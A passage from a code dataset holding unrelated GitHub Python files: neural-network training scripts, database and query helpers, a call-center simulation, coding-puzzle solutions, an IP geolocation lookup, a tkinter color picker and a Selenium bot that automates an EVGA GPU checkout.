sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\nseed = 2019\nimport random\nnp.random.seed(seed) # Numpy module.\nrandom.seed(seed) # Python random module.\n\nplt.rcParams['font.sans-serif'] = ['SimHei'] #用来正常显示中文标签\nplt.rcParams['axes.unicode_minus'] = False #用来正常显示负号\nplt.close('all')\n\ndef preprocess(data):\n #1.将非数映射数字\n for title in data.columns:\n if data[title].dtype=='object':\n encoder = LabelEncoder()\n data[title] = encoder.fit_transform(data[title])\n #2.去均值和方差归一化\n ss = StandardScaler()\n X = data.drop('好瓜',axis=1)\n Y = data['好瓜']\n X = ss.fit_transform(X)\n x,y = np.array(X),np.array(Y).reshape(Y.shape[0],1)\n return x,y\n#定义Sigmoid,求导\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\ndef d_sigmoid(x):\n return x*(1-x)\n\n##累积BP算法\ndef accumulate_BP(x,y,dim=10,eta=0.8,max_iter=500):\n n_samples = x.shape[0]\n w1 = np.zeros((x.shape[1],dim))\n b1 = np.zeros((n_samples,dim))\n w2 = np.zeros((dim,1))\n b2 = np.zeros((n_samples,1))\n losslist = []\n for ite in range(max_iter):\n ##前向传播\n u1 = np.dot(x,w1)+b1\n out1 = sigmoid(u1)\n u2 = np.dot(out1,w2)+b2\n out2 = sigmoid(u2)\n loss = np.mean(np.square(y - out2))/2\n losslist.append(loss)\n print('iter:%d loss:%.4f'%(ite,loss))\n ##反向传播\n ##标准BP\n d_out2 = -(y - out2)\n d_u2 = d_out2*d_sigmoid(out2)\n d_w2 = np.dot(np.transpose(out1),d_u2)\n d_b2 = d_u2\n d_out1 = np.dot(d_u2,np.transpose(w2))\n d_u1 = d_out1*d_sigmoid(out1)\n d_w1 = np.dot(np.transpose(x),d_u1)\n d_b1 = d_u1\n ##更新\n w1 = w1 - eta*d_w1\n w2 = w2 - eta*d_w2\n b1 = b1 - eta*d_b1\n b2 = b2 - eta*d_b2\n ##Loss可视化\n plt.figure()\n plt.plot([i+1 for i in range(max_iter)],losslist)\n plt.legend(['accumlated BP'])\n plt.xlabel('iteration')\n plt.ylabel('loss')\n plt.show()\n return w1,w2,b1,b2\n\n##标准BP算法\ndef standard_BP(x,y,dim=10,eta=0.8,max_iter=500):\n n_samples = 1\n w1 = np.zeros((x.shape[1],dim))\n b1 = np.zeros((n_samples,dim))\n w2 = np.zeros((dim,1))\n b2 = np.zeros((n_samples,1))\n losslist = []\n for ite in range(max_iter):\n loss_per_ite = []\n for m in range(x.shape[0]):\n xi,yi = x[m,:],y[m,:]\n xi,yi = xi.reshape(1,xi.shape[0]),yi.reshape(1,yi.shape[0])\n 
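# standard BP: one forward/backward pass and one weight update per training sample\n            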
##前向传播\n u1 = np.dot(xi,w1)+b1\n out1 = sigmoid(u1)\n u2 = np.dot(out1,w2)+b2\n out2 = sigmoid(u2)\n loss = np.square(yi - out2)/2\n loss_per_ite.append(loss)\n print('iter:%d loss:%.4f'%(ite,loss))\n ##反向传播\n ##标准BP\n d_out2 = -(yi - out2)\n d_u2 = d_out2*d_sigmoid(out2)\n d_w2 = np.dot(np.transpose(out1),d_u2)\n d_b2 = d_u2\n d_out1 = np.dot(d_u2,np.transpose(w2))\n d_u1 = d_out1*d_sigmoid(out1)\n d_w1 = np.dot(np.transpose(xi),d_u1)\n d_b1 = d_u1\n ##更新\n w1 = w1 - eta*d_w1\n w2 = w2 - eta*d_w2\n b1 = b1 - eta*d_b1\n b2 = b2 - eta*d_b2\n losslist.append(np.mean(loss_per_ite))\n ##Loss可视化\n plt.figure()\n plt.plot([i+1 for i in range(max_iter)],losslist)\n plt.legend(['standard BP'])\n plt.xlabel('iteration')\n plt.ylabel('loss')\n plt.show()\n return w1,w2,b1,b2\n\ndef main():\n data = pd.read_table('watermelon30.txt',delimiter=',')\n data.drop('编号',axis=1,inplace=True)\n x,y = preprocess(data)\n dim = 10\n# _,_,_,_ = standard_BP(x,y,dim)\n w1,w2,b1,b2 = accumulate_BP(x,y,dim)\n #测试\n u1 = np.dot(x,w1)+b1\n out1 = sigmoid(u1)\n u2 = np.dot(out1,w2)+b2\n out2 = sigmoid(u2)\n y_pred = np.round(out2)\n result = pd.DataFrame(np.hstack((y,y_pred)),columns=['真值','预测'] )\n result.to_excel('result_numpy.xlsx',index=False)\n\nif __name__=='__main__':\n main()\n","repo_name":"ouguiliang110/NaiveBayesNetCheck","sub_path":"NW-NBC/累计BP算法.py","file_name":"累计BP算法.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13083049918","text":"import pymysql\nfrom config import Config\n\nclass Connection:\n def __init__(self):\n self.con = pymysql.connect(\n host = Config.HOST,\n port = Config.PORT,\n user = Config.USER,\n password = Config.PASSWORD,\n db = Config.DBNAME,\n autocommit=True,\n charset = 'utf8mb4',\n cursorclass = pymysql.cursors.DictCursor\n )\n self.cur = self.con.cursor()\n\n def _select(self,sql,args=None):\n self.cur.execute(sql,args)\n self.sel = self.cur.fetchone()\n self.cur.close()\n self.con.close()\n return self.sel\n\n def _selectAll(self,sql,args=None):\n self.cur.execute(sql,args)\n self.sel = self.cur.fetchall()\n self.cur.close()\n self.con.close()\n return self.sel\n\n def _insert(self,sql,args=None):\n self.ins = self.cur.executemany(sql,args)\n return self.ins\n\n def _update(self,sql, args=None):\n self.upd = self.cur.executemany(sql,args)\n return self.upd\n\n def _delete(self, sql, args=None):\n self.delete = self.cur.executemany(sql,args)\n return self.delete","repo_name":"Squirrel-Network/NebulaUserbot","sub_path":"database/db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"42831759851","text":"from PyQt5.QtCore import *\n\nfrom rawapi import new_raw_client, RawException\nimport threading\nfrom queue import Queue\n\nclass AsyncQueryClient(QObject):\n\n query_done = pyqtSignal(object, object)\n query_validated = pyqtSignal(object)\n error = pyqtSignal(str)\n\n def __init__(self, parent = None):\n super(AsyncQueryClient, self).__init__(parent)\n self.client = new_raw_client()\n self.run = True\n self.queue = Queue()\n self.thread = threading.Thread(name='Async query', target=self.loop, daemon=True)\n self.thread.start()\n self.executing_cmd = False\n\n def loop(self):\n while self.run:\n cmd = self.queue.get()\n self.executing_cmd = True\n try:\n if cmd['action'] == 'query':\n data, tipe = self.client.query(cmd['query'], 
with_type=True)\n self.query_done.emit(tipe, data)\n elif cmd['action'] == 'validate':\n data = self.client.query_validate(cmd['query'])\n print(data)\n self.query_validated.emit(data)\n else:\n raise Exception('Unexpected command %s' % cmd)\n except RawException as e:\n self.error.emit(str(e))\n except ConnectionError as e:\n self.error.emit(str(e))\n except Exception as e:\n print(e)\n raise e\n self.executing_cmd = False\n\n def query(self, query):\n cmd = dict(action='query', query=query)\n # If the queue does not have slot it will raise an Exception\n self.queue.put(cmd, block=False)\n\n def validate(self, query):\n cmd = dict(action='validate', query=query)\n # If the queue does not have slot it will raise an Exception\n self.queue.put(cmd, block=False)\n\n def stop(self):\n self.run = False\n","repo_name":"torcato/raw-qscintilla-editor","sub_path":"src/raw_editor/query_client.py","file_name":"query_client.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25999757353","text":"'''\nCall Center: Imagine you have a call center with three levels of employees:\nrespondent, manager, and director. An incoming telephone call must be first\n allocated to a respondent who is free. If the respondent can't handle the \n call, he or she must escalate the call to a manager. If the manager is not \n free or not able to handle it, then the call should be escalated to a \n director. Design the classes and data structures for this problem. \n Implement a method dispatchCall() which assigns a call to the first \n available employee. '''\n\nimport threading\n\nclass Call_Center:\n def __init__(self,name):\n self.__name = name\n self.__employees = []\n\n def main(self):\n a = input('Enter \"call\" to call: ')\n if a == 'call':\n self.dispatchCall()\n self.main()\n else:\n print('You entered an un-recognized command')\n self.main()\n\n def employ(self,fname,lname,title):\n if title == 'Respondent':\n self.__employees.append(Respondent(fname,lname,title))\n if title == 'Manager':\n self.__employees.append(Manager(fname,lname,title))\n if title == 'Director':\n self.__employees.append(Director(fname,lname,title))\n\n def dispatchCall(self):\n respondents = []\n managers = []\n directors = []\n full_status = []\n for i in self.__employees:\n if i.gettitle() == 'Respondent':\n respondents.append(i)\n if i.gettitle() == 'Manager':\n managers.append(i)\n if i.gettitle() == 'Director':\n directors.append(i)\n full_status.append(i.call_status())\n if False not in full_status:\n print('Please hold and the next available employee will get to you shortly!')\n timer = threading.Timer(10.0,self.dispatchCall)\n timer.start()\n search = True \n for i in respondents:\n if search == True and i.call_status() == False:\n i.assigncall()\n i.settimer(threading.Timer(15.0,i.endcall))\n i.starttimer()\n search = False\n print('Respondent,',i.fname(),i.lname(),'has been assigned the call!')\n for i in managers:\n if search == True and i.call_status() == False:\n i.assigncall()\n i.settimer(threading.Timer(15.0,i.endcall))\n i.starttimer()\n search = False\n print('Manager,',i.fname(),i.lname(),'has been assigned the call!')\n for i in directors:\n if search == True and i.call_status() == False:\n i.assigncall()\n i.settimer(threading.Timer(15.0,i.endcall))\n i.starttimer()\n search = False\n print('Director,',i.fname(),i.lname(),'has been assigned the call!')\n\nclass Employee:\n def __init__(self,fname,lname):\n 
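# each employee starts off the phone; the timer is created when a call is assigned\n        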
self.__fname = fname\n self.__lname = lname\n self.__call_status = False\n self.__timer = None\n\n def assigncall(self):\n self.__call_status = True\n\n def endcall(self):\n self.__call_status = False\n print(self.__fname,self.__lname,'is available for call')\n\n def call_status(self):\n return self.__call_status\n\n def settimer(self,time):\n self.__timer = time\n\n def starttimer(self):\n self.__timer.start()\n\n def fname(self):\n return self.__fname\n\n def lname(self):\n return self.__lname\n\nclass Respondent(Employee):\n def __init__(self,fn,ln,t):\n self.__title = t\n Employee.__init__(self,fn,ln)\n\n def gettitle(self):\n return self.__title\n\nclass Manager(Employee):\n def __init__(self,fn,ln,t):\n self.__title = t\n Employee.__init__(self,fn,ln)\n\n def gettitle(self):\n return self.__title\n\nclass Director(Employee):\n def __init__(self,fn,ln,t):\n self.__title = t\n Employee.__init__(self,fn,ln)\n\n def gettitle(self):\n return self.__title\n\n#################################################################################\nCenter1 = Call_Center('Africell')\nCenter1.employ('Emmanuel','Olatunde','Director')\nCenter1.employ('Joseph','Scelera','Manager')\nCenter1.employ('Marco','Morazan','Manager')\nCenter1.employ('Femi','Adebonye','Respondent')\nCenter1.employ('Moses','Olatunde','Respondent')\nCenter1.employ('Gabriel','Olatunde','Respondent')\n\nCenter1.main()\n\n\n\n","repo_name":"Emanoid/Python-Repo","sub_path":"Call-Dispatch.py","file_name":"Call-Dispatch.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35137517946","text":"\"\"\"\n/* Turner Atwood\n * 10/12/20\n * A1 Paper [3.8] open.kattis.com/problems/a1paper\n * Greedy - take tape as needed, starting with the largest papers\n */\n\"\"\"\n\ndef main():\n dims = [2**(-3/4), 2**(-5/4)]\n # Input\n n = int(input())\n papers = [int(i) for i in input().split()]\n\n cost = 0\n needed = 2\n for i in range(n-1):\n cost = cost + (dims[i%2] * needed/2)\n dims[i%2] /= 2 # Cut the long side in half\n needed = 2 * (needed - min(papers[i], needed))\n if not needed:\n return cost\n return \"impossible\"\n\nif __name__ == \"__main__\":\n print(main())\n\n","repo_name":"TurnerAtwood/Kattis","sub_path":"Trivial/A1.py","file_name":"A1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21150039734","text":"class Solution:\n def isAdditiveNumber(self, num: str) -> bool:\n # Time Complexity: O(N^3)\n # Space Complexity: O(1)\n\n for end1 in range(len(num) - 1):\n for end2 in range(end1 + 1, len(num)):\n if (num[0] == '0' and end1 != 0) or (num[end1 + 1] == '0' and end2 != end1 + 1):\n continue\n\n first = int(num[:end1 + 1])\n second = int(num[end1 + 1:end2 + 1])\n found_third = False\n\n cur = end2 + 1\n\n while cur < len(num):\n next = first + second\n next_str = str(next)\n\n if len(next_str) > len(num) - cur or next_str != num[cur:cur + len(next_str)]:\n break\n\n first, second = second, next\n found_third = True\n cur += len(next_str)\n else:\n if found_third:\n return True\n\n return False\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/306. 
Additive Number/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"72606727787","text":"import os\nimport sys\nsys.path.append(\"src/\")\nimport pickle\nimport numpy as np\n\nfrom gnn import GraphNeuralNetwork\nfrom optimizer import Adam\nfrom train import read_train_data, read_test_data, train\n\n# 隣接行列を次数により正規化\ndef normalize(graph):\n deg = np.zeros_like(graph, dtype=float)\n for i in range(graph.shape[0]):\n graph[i][i] = 1\n deg[i][i] = 1 / np.sqrt(graph[i].sum())\n return np.dot(np.dot(deg, graph), deg)\n\nif __name__ == \"__main__\":\n train_data = np.array([(normalize(g), l) for g, l in read_train_data()])\n test_data = np.array([(normalize(g), l) for g, l in read_test_data()])\n\n for i in range(5):\n print(\"{}th model\".format(i))\n gnn = GraphNeuralNetwork(Adam())\n train(gnn, train_data, test_data, epoch_num=100)\n path_name = \"model/normalized_model{}.pickle\".format(i)\n os.makedirs(os.path.dirname(path_name), exist_ok=True)\n with open(path_name, mode=\"wb\") as f:\n pickle.dump(gnn, f)\n print(\"{} saved!\".format(path_name))","repo_name":"knshnb/PFN-task2019","sub_path":"src/kadai/kadai4-plus.py","file_name":"kadai4-plus.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26251571095","text":"#Dog Age Calculator:\n#1-ask the user for the dog's name.\n# prompt the user to enter the dog's name,store in dog_name.\n#2-ask the user for the age of the dog in years.\n# prompt the user to enter the dog's age,store in dog_years.\n#3-Multiply the dog’s age by the number 7 to get \n# the dog’s age in human years.\n# human_years = dog_years x 7.\n\n#4-output dog's name and age in human years.\n#\n# example: Your dog, [name] is\n#[human_years] years old in human years.\n#\n#==============================================\n\ndog_name = input(\"What is your dog's name? \")\n#show dog's name\n#print(dog_name)\n\ndog_age = int(input(\"What is your dog's age? 
\"))\n#show dog's age dogs years\n#print(dog_age)\n\n# calculate the human years\nhuman_years = str(dog_age * 7)\n#human_years_string = str(human_years)\n\n\nprint(\"Your dog, \" + dog_name + \" is \" + human_years + \" years old in human years.\")\n","repo_name":"billoes/learntocode","sub_path":"ch2/dogagecalculator.py","file_name":"dogagecalculator.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25778970221","text":"import os\nimport numpy as np\nimport random\nfrom math import isclose\nfrom modelZoo.DyanOF import creatRealDictionary\nimport torch\nimport matplotlib.pyplot as plt\nfrom modelZoo.DyanOF import OFModel, fista\nfrom torch.autograd import Variable\nimport torch.nn\n\n\ndef gridRing(N):\n # epsilon_low = 0.25\n # epsilon_high = 0.15\n # rmin = (1 - epsilon_low)\n # rmax = (1 + epsilon_high)\n\n epsilon_low = 0.25\n epsilon_high = 0.15\n rmin = (1 - epsilon_low)\n rmax = (1 + epsilon_high)\n\n thetaMin = 0.001\n thetaMax = np.pi / 2 - 0.001\n delta = 0.001\n # Npole = int(N / 4)\n Npole = int(N/2)\n Pool = generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax)\n M = len(Pool)\n\n idx = random.sample(range(0, M), Npole)\n P = Pool[idx]\n Pall = np.concatenate((P, -P, np.conjugate(P), np.conjugate(-P)), axis=0)\n\n return P, Pall\n\n\n## Generate the grid on poles\ndef generateGridPoles(delta, rmin, rmax, thetaMin, thetaMax):\n rmin2 = pow(rmin, 2)\n rmax2 = pow(rmax, 2)\n xv = np.arange(-rmax, rmax, delta)\n x, y = np.meshgrid(xv, xv, sparse=False)\n mask = np.logical_and(np.logical_and(x ** 2 + y ** 2 >= rmin2, x ** 2 + y ** 2 <= rmax2),\n np.logical_and(np.angle(x + 1j * y) >= thetaMin, np.angle(x + 1j * y) <= thetaMax))\n px = x[mask]\n py = y[mask]\n P = px + 1j * py\n\n return P\n\ndef plotting(input, reconstruction,key_frame, imageName, saveDir, seqNum):\n if seqNum > 1:\n\n seq1 = input[:, seqNum]\n seq2 = reconstruction[:, seqNum]\n y_key = -5 * np.ones(seq1.shape)\n else:\n seq1 = input\n seq2 = reconstruction\n y_key = -5 * np.ones(seq1.shape)\n\n y_key[key_frame,:] = seq1[key_frame,:]\n T = np.arange(0, input.shape[0],1)\n # plt.plot(T, seq1, 'b', T, seq2, 'r', T, y_key,'g*')\n plt.plot(T, seq1, 'b', label='gt')\n plt.plot(T, seq2, 'r', label='recover')\n plt.plot(T, y_key, 'g*', label='key frames')\n\n plt.legend()\n plt.title(imageName)\n plt.savefig(os.path.join(saveDir, imageName + '.png'))\n\ndef loadModel(ckpt_file, T, gpu_id):\n loadedcheckpoint = torch.load(ckpt_file, map_location=lambda storage, location: storage)\n #loadedcheckpoint = torch.load(ckpt_file)\n stateDict = loadedcheckpoint['state_dict']\n\n # load parameters\n Dtheta = stateDict['l1.theta']\n Drr = stateDict['l1.rr']\n model = OFModel(Drr, Dtheta, T, gpu_id)\n model.cuda(gpu_id)\n\n return model\n\ndef get_Dictionary(T, numPole, gpu_id, addOne):\n\n P, Pall = gridRing(numPole)\n # Drr = np.zeros(1)\n # Dtheta = np.zeros(1)\n # P = 0.625 + 1j * 0.773\n # print(P)\n Drr = abs(P)\n Drr = torch.from_numpy(Drr).float().cuda(gpu_id)\n Dtheta = np.angle(P)\n Dtheta = torch.from_numpy(Dtheta).float().cuda(gpu_id)\n\n WVar = []\n Wones = torch.ones(1).cuda(gpu_id)\n Wones = Variable(Wones, requires_grad=False)\n for i in range(0, T):\n W1 = torch.mul(torch.pow(Drr, i), torch.cos(i * Dtheta))\n\n W3 = torch.mul(torch.pow(Drr, i), torch.sin(i * Dtheta))\n if addOne:\n W = torch.cat((Wones, W1, W3), 0)\n else:\n W = torch.cat((W1, W3), 0)\n # W = torch.cat((W1, W3), 0)\n WVar.append(W.view(1, -1))\n 
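# Stack the per-frame rows into the dictionary matrix; its columns are l2-normalized below.\n    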
dic = torch.cat((WVar), 0)\n G = torch.norm(dic, p=2, dim=0)\n idx = (G == 0).nonzero()\n nG = G.clone()\n nG[idx] = np.sqrt(T)\n G = nG\n\n dic = dic / G\n\n return dic\n\ndef get_recover(D, y, key_set):\n D_r = D[key_set, :]\n y_r = y[key_set, :]\n\n dtd_r = np.matmul(D_r, D_r.T)\n\n a = np.matmul(D_r.T, np.linalg.inv(dtd_r))\n coef_r = np.matmul(a, y_r)\n\n y_hat = np.matmul(D, coef_r)\n\n return y_hat\n\ndef get_recover_fista(D, y, key_set, gpu_id):\n if type(D) is np.ndarray:\n D = torch.Tensor(D)\n\n D_r = D[key_set]\n if len(y.shape)==3:\n y_r = y[:,key_set]\n else:\n y_r = y[key_set]\n\n # lam = 0.03\n\n if D.is_cuda:\n c_r = fista(D_r, y_r, 0.01, 100, gpu_id)\n y_hat = torch.matmul(D, c_r)\n else:\n c_r = fista(D_r.cuda(gpu_id), y_r, 0.01, 100, gpu_id)\n y_hat = torch.matmul(D.cuda(gpu_id), c_r)\n\n return y_hat\n\ndef getDictionary(ckpt_file, T, gpu_id):\n\n loadedcheckpoint = torch.load(ckpt_file, map_location=lambda storage, location: storage)\n stateDict = loadedcheckpoint['state_dict']\n\n Dtheta = stateDict['l1.theta'].cuda(gpu_id)\n Drr = stateDict['l1.rr'].cuda(gpu_id)\n Dictionary = creatRealDictionary(T, Drr, Dtheta, gpu_id)\n\n return Dictionary","repo_name":"Yuexiaoxi10/K-FPN-Old-project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"10700654106","text":"from selenium import webdriver\nfrom EVGA.constants import *\nfrom selenium.webdriver.common.keys import Keys\nimport subprocess\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\nclass EVGABot(webdriver.Chrome):\n def __init__(self, images=False, VPN_Connection=True, driver_path=DRIVER_PATH):\n option = webdriver.ChromeOptions()\n option.add_argument(PROFILE)\n option.add_experimental_option(\n \"excludeSwitches\", [\"enable-automation\"])\n option.add_experimental_option('useAutomationExtension', False)\n option.experimental_options[\"prefs\"] = chrome_prefs\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 2}\n chrome_prefs[\"profile.managed_default_content_settings\"] = {\n \"images\": 2}\n if images:\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 3}\n chrome_prefs[\"profile.managed_default_content_settings\"] = {\n \"images\": 3}\n\n if VPN_Connection:\n self.vpn = subprocess.Popen([VPN_PATH])\n time.sleep(3)\n\n super(EVGABot, self).__init__(driver_path, options=option)\n self.implicitly_wait(1000)\n\n def __exit__(self, *args):\n try:\n self.vpn.terminate()\n except:\n pass\n self.quit()\n\n def findItem(self):\n self.get(BASE_URL)\n try:\n WebDriverWait(self, 3).until(\n EC.presence_of_element_located((\n By.CSS_SELECTOR, f\"[title='Add {PRODUCT_ID} to cart']\"\n ))\n )\n return True\n except:\n self.refresh()\n try:\n WebDriverWait(self, 3).until(\n EC.presence_of_element_located((\n By.CLASS_NAME, 'text'\n ))\n )\n return False\n except:\n return None\n\n def waitThenClick(self, element):\n\n item = self.find_element_by_id(element)\n\n WebDriverWait(self, 30).until(\n EC.invisibility_of_element_located((\n By.CLASS_NAME, 'ajax-bg'\n ))\n )\n\n return item\n\n def script(self):\n try:\n\n self.find_element_by_css_selector(\n f\"[title='Add {PRODUCT_ID} to cart']\").click()\n self.find_element_by_id('LFrame_CheckoutButton').click()\n 
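# Step through EVGA's checkout pages; the ids and selectors below reflect the live site at the time of writing.\n            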
self.find_element_by_class_name('btnCheckoutContinue').click()\n self.find_element_by_id('cbAgree').click()\n self.find_element_by_id('rdoShipFee65').click()\n self.find_element_by_id('ctl00_LFrame_btncontinue').click()\n self.waitThenClick('rdoCreditCard').click()\n self.find_element_by_id('ctl00_LFrame_btncontinue').click()\n self.find_element_by_id(\n 'ctl00_LFrame_txtNameOnCard').send_keys(CARD_NAME)\n self.find_element_by_id(\n 'ctl00_LFrame_txtCardNumber').send_keys(CARD_NUMBER)\n\n element = self.find_element_by_id('ctl00_LFrame_ddlMonth')\n element.click()\n element = element.find_element_by_css_selector(\n f\"[value='{EXPIRY_MONTH}']\").click()\n\n element = self.find_element_by_id('ctl00_LFrame_ddlYear')\n element.click()\n element = element.find_element_by_css_selector(\n f\"[value='{EXPIRY_YEAR}']\").click()\n\n self.find_element_by_id('ctl00_LFrame_txtCvv').send_keys(CVV)\n self.find_element_by_id('ctl00_LFrame_ImageButton2').click()\n self.find_element_by_id('ctl00_LFrame_cbAgree').click()\n self.find_element_by_id('ctl00_LFrame_btncontinue').click()\n return True\n\n except Exception as e:\n print(e)\n return False\n","repo_name":"JeffreyLin39/evga-gpu-bot","sub_path":"EVGA/EVGABot.py","file_name":"EVGABot.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26671633265","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCore of ip2loc\nNotice: no connection pool for the reason that tornado is signle thread\n\"\"\"\n\nimport ipaddress\nimport math\nimport logging\nimport sqlite3\nimport time\n\ntotal_len = 0\nmax_loops = 0\ntotal_len_update_time = 0\nTOTAL_LEN_UPDATE_INTERVAL = 5 * 60 # 5 min\n\n\ndef ip2int(ip: str) -> int:\n return int(ipaddress.IPv4Address(ip))\n\n\ndef update_data_length(conn: sqlite3.Connection) -> None:\n global total_len, max_loops, total_len_update_time\n\n if total_len and total_len_update_time and \\\n time.time() - total_len_update_time <= TOTAL_LEN_UPDATE_INTERVAL:\n return # use cache\n\n cursor = None\n # noinspection PyBroadException\n try:\n cursor = conn.cursor()\n sql = 'SELECT MAX(id) FROM ip2location'\n cursor.execute(sql)\n total_len = cursor.fetchone()[0] + 1\n max_loops = round(math.log2(total_len)) + 1\n total_len_update_time = time.time()\n logging.debug(f'update_data_length success, total_len: {total_len}, max_loops: {max_loops}')\n except Exception as e:\n logging.error(f'update_data_length error: {e}', exc_info=True)\n if not total_len:\n raise e\n finally:\n if cursor:\n cursor.close()\n\n\ndef ip2loc(conn: sqlite3.Connection, ip: str) -> dict:\n \"\"\" IPV4 to geo location implementation\n Using binary search\n \"\"\"\n update_data_length(conn)\n int_ip = ip2int(ip)\n cursor = None\n # noinspection PyBroadException\n try:\n cursor = conn.cursor()\n start, end = 0, total_len\n\n for _ in range(max_loops):\n idx = (start + end) // 2\n sql = f'SELECT id, ip_from, ip_to, country_code, country_name, region_name, city_name, latitude, longitude'\\\n f' FROM ip2location WHERE id={idx}'\n cursor.execute(sql)\n ret = cursor.fetchone()\n ip_from, ip_to = ret[1], ret[2]\n if ip_from <= int_ip <= ip_to:\n return {\n 'ip': ip,\n 'country_code': ret[3],\n 'country_name': ret[4],\n 'region_name': ret[5],\n 'city_name': ret[6],\n 'latitude': ret[7],\n 'longitude': ret[8],\n }\n if int_ip < ip_from:\n end = idx - 1\n continue\n elif int_ip > ip_to:\n start = idx + 1\n else:\n # Though I think this would never happen here,\n # carefully using 'max_loops' 
is better here than just 'while True'\n raise Exception(f\"'{ip}' exceeds max loops {max_loops}!\")\n except Exception as e:\n logging.error(f'ip2loc error: {e}, ip: {ip}', exc_info=True)\n return {}\n finally:\n if cursor:\n cursor.close()\n","repo_name":"ZhenningLang/ip2loc-server","sub_path":"src/ip2loc_server/ip2loc.py","file_name":"ip2loc.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24157965527","text":"from tkinter import ttk\nimport re\n\nfrom tkcolorpicker import colorpicker\n\n\nclass ColorPicker(colorpicker.ColorPicker):\n \"\"\"Color picker dialog.\"\"\"\n\n def __init__(self, parent=None, color=None, alpha=False,\n title=\"Color Chooser\"):\n self._prefix = True\n try:\n match = re.match(r\"^(#?)[0-9A-Fa-f]{6}$\", color)\n if not match.groups()[0]:\n color = '#' + color\n self._prefix = False\n except (TypeError, AttributeError):\n color = '#FF0000'\n self._prefix = True\n colorpicker.ColorPicker.__init__(self, parent, color, alpha, title)\n\n # --- validation\n button_frame = self.grid_slaves(4, 0)[0]\n b_ok, b_close = button_frame.pack_slaves()\n b_close.configure(text='Close')\n b_ok.pack_forget()\n b_ok.pack(side=\"right\", padx=10)\n ttk.Button(button_frame, text=\"Insert\",\n command=self.insert).pack(side=\"right\", padx=10)\n self.grab_release()\n self.bind('<Escape>', lambda e: self.destroy())  # key sequence restored: the angle-bracket text was stripped during extraction\n\n def insert(self):\n rgb, hsv, hexa = self.square.get()\n if self.alpha_channel:\n hexa = self.hexa.get()\n rgb += (self.alpha.get(),)\n self.color = rgb, hsv, hexa\n self.event_generate(\"<>\")  # NOTE: the virtual-event name (a <<...>> sequence) was lost in extraction\n\n def get_color(self):\n if self._prefix:\n # return HTML format with leading #\n return self.color[2]\n else:\n # return HTML format without leading #\n return self.color[2][1:]\n\n def ok(self):\n self.insert()\n self.destroy()\n","repo_name":"j4321/PyTkEditor","sub_path":"pytkeditorlib/dialogs/colorpicker.py","file_name":"colorpicker.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"15019266276","text":"from collections import defaultdict\nfrom string import ascii_uppercase\n\n\nblub = iter(ascii_uppercase)\n\n\ndef findMFD(input_str):\n \n digrams = defaultdict(int)\n for i in range(1,len(input_str)):\n last_char = input_str[i-1]\n c_char = input_str[i]\n digrams[last_char + c_char] += 1\n return sorted(digrams.items(),key=lambda x: x[1], reverse=True)[0]\n\n\ndef replaceMFD(digram, input_str, non_terminal):\n return input_str.replace(digram, non_terminal)\n\n\ndef repair(input_str):\n mfd, freq = findMFD(input_str)\n rules = []\n while freq > 1:\n nt = next(blub)\n input_str = replaceMFD(mfd, input_str, nt)\n rules.append(f'{nt}-->{mfd}')\n mfd, freq = findMFD(input_str)\n nt = next(blub)\n rules.append(f'{nt}-->{input_str}')\n return ','.join(rules)\n\n\ndef decompress(rules):\n rules = rules.split(',')\n s = rules[-1].split('-->')[1]\n for rule in rules[::-1]:\n nt, digram = rule.split('-->')\n s = s.replace(nt, digram)\n return s\n\n\nif __name__ == '__main__':\n test_str = 'abcabcbc'\n erg = repair(test_str)\n print(erg)\n decomp = decompress(erg)\n print(decomp)","repo_name":"frederikpietzko/DBIS","sub_path":"string_rePair.py","file_name":"string_rePair.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9477473378","text":"import numpy as np\n\n\nclass 
